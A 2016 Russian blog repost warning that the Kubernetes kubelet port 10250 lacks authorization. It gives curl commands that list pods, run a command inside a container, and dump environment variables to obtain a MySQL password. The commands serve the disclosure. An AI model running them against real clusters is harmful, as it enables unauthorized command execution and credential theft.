Предостережение для пользователей Kubernetes

Все блоги / Про интернет 26 августа 2016 518

Сервис kubelet, с которым тесно общается apiserver, слушает порт 10250. Этот порт хоть и использует сертификаты, но лишь для шифрования канала, никакой авторизации на нём нет.

Об этой проблеме известно давно, но почему-то никто не считает её серьезной. Ссылки на обсуждения:

https://github.com/kubernetes/kubernetes/issues/3168

https://github.com/kubernetes/kubernetes/issues/7965

https://github.com/kubernetes/kubernetes/issues/11816

Что с этим можно сделать? Правтически всё. Без регистрации и sms.

Получить список всех pod'ов:

$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

Выполнить команду внутри контейнера? Запросто:

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

Получить пароль на базу данных? Проще простого:

$ curl -k -XPOST "https://k8s-node-1:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'

Вытащить из неё данные тоже не составит труда.

Источник: Хабрахабр

Оцените публикацию

💬 Комментарии

В связи с новыми требованиями законодательства РФ (ФЗ-152, ФЗ «О рекламе») и ужесточением контроля со стороны РКН, мы отключили систему комментариев на сайте.

🔒 Важно Теперь мы не собираем и не храним ваши персональные данные — даже если очень захотим.

💡 Хотите обсудить материал?

Присоединяйтесь к нашему Telegram-каналу:

https://t.me/blogssmartz

Нажмите кнопку ниже — и вы сразу попадёте в чат с комментариями

предыдущая статья

следующая статья

Похожие публикации

[Перевод] Анализ хака Kubernetes — бэкдор через kubelet

Чтобы ничего не знать о Kubernetes, надо было последние три года прожить в пещере. В Handy инфраструктура разработки, CI/CD и продакшена построена на многокластерной экосистеме Kubernetes. Можно сказать, что мы в Handy фанаты Kubernetes, вот почему мы так удивились, когда личный кластер Kubernetes

подробнее »

8 июня 2018

[Перевод] Охота за ошибками в Kubernetes официально открыта

Прим. перев.: Две недели назад стартовала программа Bug Bounty у Kubernetes — долгожданный и важный шаг для столь масштабного Open Source-проекта. В рамках этой инициативы любой энтузиаст, обнаруживший проблему в безопасности K8s, может получить награду в объёме от 100 USD (минимальная критичность)

подробнее »

28 января 2020

Как изменился поиск черной кошки в темном Kubernetes

Немного (в)водной Kubernetes (или K8s) — это расширяемая платформа, которая становится стандартом среди систем оркестрации при построении Cloud Native приложений. Сейчас все больше компаний переходят на Kubernetes. Поскольку он является одной из самых критичных составляющих DevOps-процесса,

подробнее »

10 декабря 2020

[Перевод] Пользователи и авторизация RBAC в Kubernetes

Прим. перев.: Продолжая недавно затронутую нами тему безопасности Kubernetes в целом и RBAC — в частности, публикуем перевод этого материала от французского консультанта из международной компании Big Data-компании Adaltas. Автор в деталях показывает, как создавать пользователей, наделять их правами

подробнее »

10 октября 2019

Фреймворк .NET Core доступен на облачном хостинге Jelastic

Облачный хостинг Jelastic теперь поддерживает фреймворк .NET Core на базе платформы Linux. В Jelastic доступно множество инструментов для упрощения деплоя приложений на различных технологиях. В настоящий момент поддерживается языки программирования — PHP, Java, Ruby, Python, Node.js, Golang, .NET и

подробнее »

22 июля 2020

[Перевод] 11 способов (не) стать жертвой взлома в Kubernetes

Прим. перев.: Оригинал этой статьи был опубликован в официальном блоге Kubernetes и написан Andrew Martin — одним из основателей молодой британской компании Control Plane, специализирующейся на безопасности для cloud native-приложений, запускаемых в K8s. Безопасность в Kubernetes прошла длинный

подробнее »

25 июля 2018